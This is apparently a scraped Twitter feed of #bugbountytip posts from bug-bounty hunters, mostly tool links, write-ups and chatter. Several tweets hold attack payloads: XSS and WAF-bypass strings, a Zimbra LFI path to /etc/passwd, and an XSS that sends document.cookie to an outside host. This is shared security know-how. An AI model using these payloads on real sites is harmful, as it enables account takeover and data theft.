13 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @ฬถLฬถiฬถvฬถeฬถOฬถvฬถeฬถrฬถfฬถlฬถoฬถwฬถ @EdOverflow! https://t.co/bAE0snqYcZ
Rafin Rahman Chy
@rafinrahmanchy


2020-01-09 12:48:21
0 @intigriti It's not a #bugbountytip ๐Ÿ˜’
Larouanne Tristan
@Tr4LSecurity


2020-01-09 12:10:14
0 Following the release of the MavenDecoder, here is an article on how to use #maven repository, secure them, and unsecure them: https://t.co/etGTIW5Div #pentest #bugbountytip
Rushiikesh
@u1tran00b


2020-01-09 08:47:01
0 Thank you so much for the awesome swag @Bugcrowd.... Waiting for the P1 Warrior Level 3 swag pack now...๐Ÿ˜๐Ÿ˜....Thanks for being a great platform.... If you are a newbie start your journey with #Bugcrowd #bugbounty #bugbountytips #bugbountytip โค๏ธโค๏ธ https://t.co/ndXSnTmFpN
Mufeed VH
@mufeedvh


2020-01-08 15:46:26
9 Hey all, I started a youtube channel on bug bounties, programming, and security. This is my first video, an intro about me and the channel. I hope you guys are into memes and stuff. :) https://t.co/U99UY5w2cR #bugbounty #bugbountytip #infosec
STร–K
@stokfredrik


2020-01-08 15:28:44
30 Bug Bounty hunters & Pentesters alike, they all love to run their own domain and DNS Servers to log Out of Band interactions caused by RCEs, XXE's SSRFs and blind requests. And now you can do that too! Better safe than sorry! https://t.co/BgEpHIzjZr #bugbountytip #infosec #howto https://t.co/W5DyPENH5z
Aman Mahendra
@amanmahendra_


2020-01-08 10:44:39
0 Thanks @Hacker0x01 for this amazing hoodie ๐Ÿ˜๐Ÿ”ฅ #bugbountytip #togetherwehitharder https://t.co/pU6HqPMPC9
Ammar Amer
@cry__pto


2020-01-08 10:06:05
6 #BugBounty tools part (5): HTTPScreenShot:https://t.co/qIuJA1SuJW SubBrute:https://t.co/5i2SI5Dzn7 OnlineHashCrack:https://t.co/zkqBbBh4un Wfuzz:https://t.co/qCK5ghmU5H LinkFinder:https://t.co/k015xUNhCm aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Christian Folini
@ChrFolini


2020-01-08 09:25:13
0 Working on my first blog post of the year: fingerprinting the #OWASP ModSecurity @CoreRuleSet This is surprisingly difficult, but I do not like security by obscurity, so here we go! #WAF #CRS3 #BugBountyTip
m0z
@LooseSecurity


2020-01-08 01:06:16
6 Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbounty #infosec #CyberSecurity
Tragger Osbourne๐Ÿง
@OsbourneTragger


2020-01-07 17:40:48
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope ๐Ÿคž, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/NtQPLB8oZt
Tragger โšก๏ธโ˜„๏ธ
@NyataraOsborne


2020-01-07 17:35:05
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope ๐Ÿคž, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/waG51ZWIUX
Arif Khan
@payloadartist


2020-01-07 16:38:14
0 Excellent article by @streaak on his recon methodology #bugbounty #bugbountytip https://t.co/UqLBT5AJ3r
AkaaZaan
@AkaaZaan


2020-01-07 16:31:07
0 I want file upload payloads. Anyone guide me to some repository? #bugbountytip
Cryptographer
@crypt0gr4ph3r


2020-01-07 14:55:43
0 #bugbountytip I don't know how and why, I changed the expired token value from xxxxb to xxxxB, and it works ๐Ÿคฃ #hackerone #bugcrowd #bugbounty #hacker101
Sanketh Sharath
@sharathsanketh


2020-01-07 13:20:48
2 The need for making notes and having an organized methodology in bug bounty hunting https://t.co/kgFctJB2PV #bugbounty #bugbountytips #bugbountytip #webhacking
Yassine Aboukir ๐Ÿ
@Yassineaboukir


2020-01-07 10:21:11
2 I like decompiling older versions of android mobile apps to find deprecated API legacy endpoints as well as hardcoded creds which are surprisingly valid most often. You may use this mirror website for that purpose https://t.co/coCgEd89ly #bugbountytip
Dewanand Vishal
@dewcode91


2020-01-07 05:29:34
0 People who don't know how to approach a target app in bug bounty. Please Read Web Application Hackers Handbook- Chapter4. #intigriti #bugbountytip
GokhanGK
@gkhck_


2020-01-06 20:34:59
2 My first bug bounty writeup. It was a bit inexperienced but I wanted to share :) #bugbountytips #bugbountytip #infosec https://t.co/JGLTMr4BMK
Ammar Amer
@cry__pto


2020-01-06 16:22:32
5 Practice part (3): https://t.co/WPU9fCoxTd https://t.co/ZwkDd9pnFd https://t.co/XUfNhHJFmk https://t.co/XrESMMzbPD https://t.co/e61c34U8tC https://t.co/vLZjeXTwtQ https://t.co/XHVhlnzJjb https://t.co/7okAXhgpZt #bugbountytip #Hacking #PenTest
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-06 13:42:55
0 Every Hacker Will Agree ! ๐Ÿ“ฒ๐Ÿ†๐Ÿ’ฐ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gesA7tYLqX
dark_warlord14
@dark_warlord14


2020-01-06 11:23:43
0 What can you do with ffuf? 1. Directory bruteforcing 2. Parameter discovery 3. Vhost bruteforcing 4. Parse waybackurls data filtered by status code, response length It's extremely fast. With 200 threads on 1gb ram VPS, I can get 1000 requests per second easily. #bugbountytip
Dan Cimpean
@DanCimpean


2020-01-05 23:11:44
0 GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties #bugbountytip #bugbounty #infosec https://t.co/ojMfeteDaT
Khaled Mohamed
@xelkomy


2020-01-05 22:06:43
2 Tool #XSpear is very great. @hahwul thanks very much for this a tool๐Ÿ˜…๐Ÿ˜ #bugbountytips #bugbountytip #infosec #xelkomy
Shaked Klein Orbach ๐Ÿ‡ฎ๐Ÿ‡ฑ
@shakedko


2020-01-05 21:28:25
2 First time I hear about AppBandit by @websecurify (https://t.co/w2W2Rt6205). Have you heard about it? Is it any good? UI seems nicer than Burp's #BugBounty #BugBountyTip #Infosec
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@s0umadip


2020-01-05 20:06:16
0 awesome-forensics:- A curated list of awesome forensic analysis tools and resources. https://t.co/v9MDCYiQnN #bugbounty #bugbountytips #bugbountytip #forensics https://t.co/bvm7JNYaw0
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@s0umadip


2020-01-05 19:49:57
0 Offensive Security Wireless Attacks - WiFu v3 https://t.co/i77ZcVJyiK InfiniteSkills - Mastering Python -Networking and Security https://t.co/PwaSg3aXtV Choosen Books for easiest road to OSCP from my experiance https://t.co/8fnP5BkVBi #bugbounty #bugbountytips #bugbountytip
Tirtha Mandal
@tirtha_mandal


2020-01-05 13:44:26
2 I would like to thank my good friend @brutelogic for helping me to bypass WAFโค๏ธโค๏ธ It worked like magic. ๐Ÿ˜ #xss #wafbypass #bugbountytip #bugbounty ๐Ÿ˜
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:43:38
0 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:40:51
0 "--!><Script%20/K/>confirm(document.domain)</Script%20/K/> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ '%22--%3E</style></scRipt><scRipt>alert('XSS')</scRipt> "><img src=x onerror=confirm(1);> #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 06:01:38
1 Stay #CyberSafe Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gyc6PziIKB
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 05:57:33
0 Gmail ShortCuts ! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pkHRBQI2KK
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 04:28:29
3 #OSCP Like VMS ! Lets #TryHarder ! Part 2 โ€” Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ofajN5TlU9
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 04:23:37
0 #OSCP Like VMS ! Lets #TryHarder ! Part 1 โ€” Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/469VcpzzPb
android_security
@pwn0sec


2020-01-05 01:15:15
1 Learning Pentesting for Android devices https://t.co/AR2CVpCENh #bugbounty #bugbountytip #bugbountytips #android
bugbountytip
@a_l_e_r_t_1_


2020-01-04 16:11:56
1 XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')> #bugbountytip #bugbountytips #hackingcommunity
James Nunes
@jamesgnunes


2020-01-04 13:39:08
0 So, @Xiaomi says it has fixed Mi Home Security Camera bug that displayed pictures from other cameras on Google Nest hub. https://t.co/6b5btrAPnk #Xiaomi #Google #bugbountytip #bughead #tech #TechNews #technology #blog #blogger #WordPress
Evan Custodio
@defparam


2020-01-04 00:13:12
0 An HTTP Request Smuggling CL.TE bug lets you redirect a victim connection to a forged endpoint with GET parameters. FYI you can execute a forged graphql query this way on the victim by using: GET /graphql?query=<query> #bugbountytip
m0z
@LooseSecurity


2020-01-03 19:48:43
7 A cool list by @vaib25vicky which indexes useful resources for educating yourself about mobile security! It's a cool area to get into with lots of #bugbounties to be found. https://t.co/AZpQyQNwUN #BugBounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2020-01-03 19:46:57
0 Awesome tool to get your target initial recon! #infosec #bugbountytip https://t.co/ysJXq6Yi4t
Bala Elangovรฃn
@balaelangovan03


2020-01-03 18:47:40
1 My first blog about "How to get started in bug bounty? (Newbie's Perspective)". https://t.co/jHSoKDM7Yo #bugbountytips #bugbountytip #bugbounty
Ammar Amer
@cry__pto


2020-01-03 18:30:16
8 Practice part (2): https://t.co/X281shcjyP https://t.co/spNrTQFgSb https://t.co/vHcoFvviU4 https://t.co/sezBbjXqqh https://t.co/lN4dzsQzSK https://t.co/M9acV7uh2L https://t.co/3wpLokyrgW https://t.co/A1qXCSlOA3 https://t.co/XiR5giK6K9 #BugBounty #bugbountytip #hacking #pentest
noobSecurity
@noobsec_org


2020-01-03 02:00:45
5 P1 on new year (zimbra LFI) [https://t.co/Ab4o1tOu0o]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 #bugbounty #togetherwehitharder #bugbountytips #bugbountytip https://t.co/NH7meUlaH0
m0z
@LooseSecurity


2020-01-02 20:30:41
1 We are almost at 1,000 members in the League of Bounties discord server! Thanks to all the members who always make it a great chat. :) https://t.co/tVOlrpA4KP #bugbountytips #BugBounty2020Goals #bugbountytip
Arshad Aman
@MeArshadaman


2020-01-02 14:57:03
0 When You Go to HackerOne and see Bounty of $20000 but already claimed by someone else, Then #hacking #cybersecurity #BugBounty2020Goals #bugbountytip @Hacker0x01 @Bugcrowd https://t.co/M6xq9TArVj
Selim Enes Karaduman
@Enesdex


2020-01-02 00:02:45
1 Are all subdomains of https://t.co/UJzSqq2q8o in scope or just https://t.co/I6tTfy4Xfw? I found a bug on a subdomain of spotify but I'm confused about its in scope or not #BugBounty #bugbountytips #bugbountytip #hackerone @Spotify @Hacker0x01 @alicanact60 https://t.co/44Xo60yvM9
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-01 16:23:31
0 #Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that. Follow Us ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
Elsadat โœช
@M0_SADAT


2020-01-01 14:53:06
0 Yaaay, what a great start of 2020!!! Just discovered my 2nd SQL injection on private program @Bugcrowd ! I guess Iโ€™m the 1st hacker found P1 on 2020๐Ÿ”ฅ Happy new year https://t.co/rYxy7EDxzk you made my day๐Ÿ˜‚ #bugbountytip SQLI still alive! #bugbounty #HappyNew2020 #hacking https://t.co/G1GJuet3A4
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-01 12:11:47
3 Thats When We Decided To Become BUG HUNTERS ! โค๏ธ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/Ki3Tvkbeia
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-01 08:45:22
0 Happy New Year Hackers and Bug Bounty Hunters ! Have an Awesome Year with lots of Bounties and $$ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting https://t.co/7t7Lm5yn0r
drivertom
@drivertomtt


2020-01-01 01:50:28
2 Just curious about whether twitter bots click Like merely by hashtag #malware #APT #cybersecurity #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:50:41
1 Here are 2 tools which are useful for scraping subdomains/directories in javascript files. https://t.co/VCZ4tzZamU by @jobertabma https://t.co/b0NRR2ub2w by the best hacker in the world #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:45:48
3 I'm still hosting 2 #XSS challenges on my challenge site! https://t.co/cNYQsW7qVi Both were inspired by real bounties I have found! If you haven't already tried your hand at them, it's well worth a go. #bugbounty #bugbountytip #bugbountytips #infosec
Ammar Amer
@cry__pto


2019-12-31 19:40:35
4 #bugbounty tools part (1): tko-subs:https://t.co/Tawtj1NvWc truffleHog:https://t.co/B3OeZDOdH0 subfinder:https://t.co/QqNOKFuHk1 sslScrape:https://t.co/448jbQ2nbw Gobuster:https://t.co/NI2PnTIFdy SecLists:https://t.co/QPSqeXvWix EyeWitness:https://t.co/461kpUL5CA #bugbountytip
Khaled
@Khaled95677506


2019-12-30 17:34:29
0 My 1st RCE๐Ÿ˜Ž With my bro Osama Alaa. Don't forget to test PHP-CGI, it may give you RCE #bugbountytips #BugBounty #bugbountytip https://t.co/iyLami2sWr
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-30 17:32:47
0 StrandHogg Bug - Unpatched Android OS Vulnerability #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/8Cr6ShD9jf
Nick || hunt4p1zza
@ngkogkos


2019-12-30 16:58:55
0 Need target specific folders list for fuzzing based on robots.txt? Use @TomNomNom's meg tool: 1. meg -c 200 path.txt urls.txt meg_robots 2. cat meg_robots/index | grep "200 OK" | awk '{print $1}'| xargs cat | grep "Disallow:" | awk '{print $2}' | sort -u #bugbountytip #bugbounty
bug bounty tips - Retweet
@BugbountytipsR


2019-12-30 13:22:23
2 CAN YOU EARN $15000 BY CLICKJACKING? Raushan Raj ========== ^This man did [Tag him if you know his twitter handle] #bugbountytips #bugbountytip WriteuP https://t.co/QhE7nmsJEB
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-30 12:21:45
6 โœˆ๏ธUse Telegram bot as a Penetration Testing Framework ๐Ÿ†๐Ÿ†๐ŸŽ–๐ŸŽ–๐Ÿ’ฐ๐Ÿ’ฐ Follow this page and learn Bug Bounty Tips and Tricks https://t.co/27kPwhJVdt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone
Larouanne Tristan
@Tr4LSecurity


2019-12-30 10:47:25
0 Doing some #pentesting in a company using #maven ? Look for xml file in the user .m2 folder. This contains password easily decryptable https://t.co/dg9nBqjWoT #infosec #hacking #pentest #CyberSecurity #bugbountytips #bugbountytip #java
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-30 10:34:05
0 #burp #bugbountytips #bugbountytip RCE with Burp Suite intruder + Regex https://t.co/JmpAvEfNr3 via @YouTube
Men up
@uppmen


2019-12-30 00:42:39
0 How did I earn $3133.70 from Google Translator? @Google @TranslateTricks #BugBounty #bugbountytip #BugBounty2020Goals ๐Ÿ˜† https://t.co/nVwersBz1n
Dr.FarFar โ“ฒ
@3XS0


2019-12-29 20:53:47
0 Old #bugbountytip from 5 years ago! https://t.co/4o2f9Wgs7Aย โ€ฆ
ghostlulz
@ghostlulz1337


2019-12-29 19:52:43
13 Source Code Analysis SQLI: https://t.co/m5K3yzo6iU Source Code Analysis XSS: https://t.co/Ke274Lvc9e Source Code Analysis Race Condition: https://t.co/jycSCNE9ms Bug Bounty Book - https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #redteam #infosec #xss #dfir https://t.co/vP7FxiOTGH
Nick || hunt4p1zza
@ngkogkos


2019-12-29 18:22:20
0 If you are not using @hacker_'s getallurls Go tool when doing #recon & #bugbounty you are missing out on interesting URLs/endpoints as it fetches from 3 sources: AlienVault/Wayback Machine/Common Crawl. Before using check you are not IP blocked from these. #bugbountytip https://t.co/rj0EjuXs1t
Sahil Ahamad
@ehsahil


2019-12-29 16:11:02
11 Time for #bugbountytip - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results. #bugbountytips #HappyHacking
ghostlulz
@ghostlulz1337


2019-12-29 15:56:37
5 Clickjacking is an easy $100 - $500 vulnerability. Super easy to find and often forgotten by developers and hunters alike. Easy wins all day. More info on my blog: https://t.co/kcOYSJcbUG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #redteam #dfir https://t.co/4zPbulEHqC
Andy Garcia
@GaelleTjat


2019-12-29 15:49:12
2 For sure horizontal moves require some form knowledge of the vertical ones. Referring to the Cors Lab 3 where you need to know/read XSS in order to solve the lab ๐Ÿคฆ๐Ÿพโ€โ™€๏ธ๐Ÿคฆ๐Ÿพโ€โ™€๏ธ๐Ÿคฆ๐Ÿพโ€โ™€๏ธ #BugBounty #bugbountytip #BugBounty2020Goals
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-29 15:18:24
0 If you spend most of your time in low speed internet connection like me i.e > 100KB/sec just use Google cloud shell which is free or just use a cheap vps providers like digital ocean :) #bugbountytip https://t.co/CvazXZy8p1
bug bounty tips - Retweet
@BugbountytipsR


2019-12-29 03:45:01
0 "The more you talk, the more they REVEAL" TIP : Check The Server Response Carefully x 3 Tool TIPs: You can modify response by burp [FACEBOOK HACKED] by EVIL BOY AJAY @evilboyajay wRITEUp https://t.co/26eGroHHNu #bugbountytip #bugbountytips
๐Ÿง ๐Ÿดโ€โ˜ ๏ธBorbolla
@renatoborbolla


2019-12-29 03:29:38
0 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #Pentesting
Pentester /KรถkBรผre
@GokBoruEfe


2019-12-28 23:40:34
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
plenum ๐Ÿ‡น๐Ÿ‡ณ
@plenumlab


2019-12-28 20:52:16
0 There are only two kinds of infosec folks: - Those who say P.O.C - Those who say POC as POK There you have it now you know. #bugbountytips #bugbountytip
Antonio
@HerrJoost


2019-12-28 20:25:31
2 Best budget notebook focused on programming /#bugbounty? #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-28 16:17:21
7 Cross-Origin Resource Sharing (CORS) can be used to bypass the Same Origin Policy(SOP) and read sensitive user data if implemented improperly. Easy wins all day. Learn more on my blog: https://t.co/ZdNpP9a3hy #BugBounty #bugbountytip #bugbountytips #infosec #appsec #osint #cors https://t.co/hR0qm2YeGc
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-28 14:58:50
0 #bugbountytips #bugbountytip #Brutelogic #knoxss Thank @rodoassis for this test page. When you love xss and try do it in your phone browser: Android mozilla https://t.co/sRV8TzIgIP
ghostlulz
@ghostlulz1337


2019-12-28 13:31:41
30 If your looking to make a living doing bug bounties or penetration testing you may want to get a copy of my book: https://t.co/zJFRZjg5q2 #bugbounty #xss #osint #redteam #bugbountytips #bugbountytip #infosec https://t.co/fVT4hqpfpi
Ashish Kunwar
@D0rkerDevil


2019-12-28 12:50:58
1 #bugbountytip do asn lookups and do nmap scan on cidr range[s]. and you might end up with jucy services like rpcbind , snmp etc or panels having default creds.
Nouroz Gaming
@NourozGaming


2019-12-28 10:01:10
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 08:15:48
9 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 07:58:17
17 Reverse Shell Cheat Sheet TooL: https://t.co/ROjGR5MCTl #bugbountytip #hacking #pentest https://t.co/00p6QbX7sO
Ammar Amer
@cry__pto


2019-12-28 07:53:24
7 JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool: https://t.co/EMKunAzMS5 #bugbountytip #hacking #pentest
m0z
@LooseSecurity


2019-12-28 00:51:41
0 A nice find by @s3c_krd which is definitely worth checking out: https://t.co/JRj3kv0zDI CRLF Injection is kinda rare to come by these days, but and this was a cool PoC on Twitter. :) #bugbounty #bugbountytip #bugbountytips
Th3Alch3mist~
@Debian_Hunter


2019-12-27 17:06:41
2 Found this in a write-up and this is cool ....have a look XSSI:- https://t.co/s6baugCH6l JSONP:- https://t.co/BNkRFlwTnN #bugbountytips #bugbounty #bughunting #bugbountytip https://t.co/9SXzd4t9Kw
Tinu rockk
@TinuRock007


2019-12-27 15:41:10
0 finally secure @sony 2019 arrived as xmas gift :) #swag #bugbountytips #bugbountytip #cybersecurity #sony #hackerone #togetherwehitharder https://t.co/77H3eJ2uV9
Mashoud1122
@mashoud1122


2019-12-27 09:28:34
2 Did my 1st collab with @OriginalSicksec and @Skeletorkeys We got an amazing XSS on https://t.co/mVGZMsShQL WAF Bypass used: document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>') #bugbountytips #bugbountytip #BugBounty https://t.co/xkL6Dr47ed
D ฮž ฮž P ฮ› K โš™๏ธ
@Deepak_maxx


2019-12-27 06:40:48
0 Hey @NahamSec just so you know people in India pronounce your name as "Ben shani-singhnapur" ! ๐Ÿ™ƒ #bugbounty #bughunter #bugbountytips #bugbountytip
cor3_cls
@cor3_cls


2019-12-26 20:01:06
3 @enigmaticsoulrg @zPrototype2 @gobias_infosec paid: @PentesterLab. Free: @hacker0x01 Hacker101 site and CTF. @Bugcrowd levelup and university <3 (youtube & git), and the best for me is @PortSwigger @WebSecAcademy Also #bugbountytip hashtag and @intigriti tips are very informative.
Karna
@karna__1


2019-12-26 17:56:24
0 To all those who want to know 'How do I get started with Bug Bounties?', go through the threads! #bugbounty #bugbountytips #infosec #bugbountytip #gettingstarted https://t.co/kgXdWqIHJ2
D ฮž ฮž P ฮ› K โš™๏ธ
@Deepak_maxx


2019-12-26 13:09:29
5 Port scanning can be seen as, or construed as, a crime. We should never execute a port scanner against any website or IP address without explicit, written permission from the owner of the server or computer that you're targeting #infosecurity #infosec #cybersecurity #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-26 10:29:34
2 Check out my new blog about Bypassing Brand Collabs Manager Eligibility. #bugbountytip #bugbounty #cybersecurity https://t.co/VpLI1UNVz6
Nassec.io
@nassecio


2019-12-26 10:26:23
3 @evilboyajay has a new write up for the bug bounty community. Check out our weekly blog about Brand Collabs Manager bypass on Facebook. #infosec #infosecmatters #hacking #bugbounty #bugbountytip https://t.co/4TDqHCMUso
Andy InfoSec
@AndyInfoSec_


2019-12-26 07:22:01
0 Part 3: Resources about #GraphQL #bugbounty Facebook GraphQL CSRF: https://t.co/7LnN4yo1Zp Tools : https://t.co/I52mNTERIN https://t.co/MHIuNuvaHC https://t.co/qlCtI5KJMI https://t.co/LPOkb9LtSj #cybersecurity #bugbountytip #bug #bounty #vapt #andyinfosec
Texy45
@RegisDeldicque


2019-12-26 06:06:42
0 @yeswehack @intigriti #bugbountytips #bugbountytip Tips : if your target forward http to https urls, try to add %0a char at the end of http urls. You could probably find out juicy paths.
Asad Anwar
@AsadAnw90


2019-12-25 23:25:13
0 Always look "view-source" page, sometime html page containing secret key. #bugbountytip #bugbounty https://t.co/VxzIgzVd06
Cryptographer
@crypt0gr4ph3r


2019-12-25 16:50:02
0 #bugbountytip When token says invalid on password change when unauthorisation. Try to use the same invalid token when authorisation. Low severity acount takeover , awarded $200 bounty #hackerone #bugbounty #hacker101
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-25 07:22:52
0 OWASP Events Calendar - Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #eccouncil #owasp #hackerone https://t.co/q2BFcxrK65
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-25 07:14:39
3 Windows Process Hacking Library Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #FolloMe https://t.co/t6TtdwgfQm
Sayaan Alam
@ehsayaan


2019-12-25 06:01:11
0 Finally Done with LazyRecon Set-Up on Ubuntu VM , Thanks to @NahamSec For this great script.. #bugbountytip #bugbounty https://t.co/XLxtx3FAKS
warbid
@id_warb


2019-12-25 02:02:44
0 Why does everyone talk about PDO if it doesn't work? Yet another case IRL. #bugbountytip https://t.co/efz78UQSd6
bug bounty tips - Retweet
@BugbountytipsR


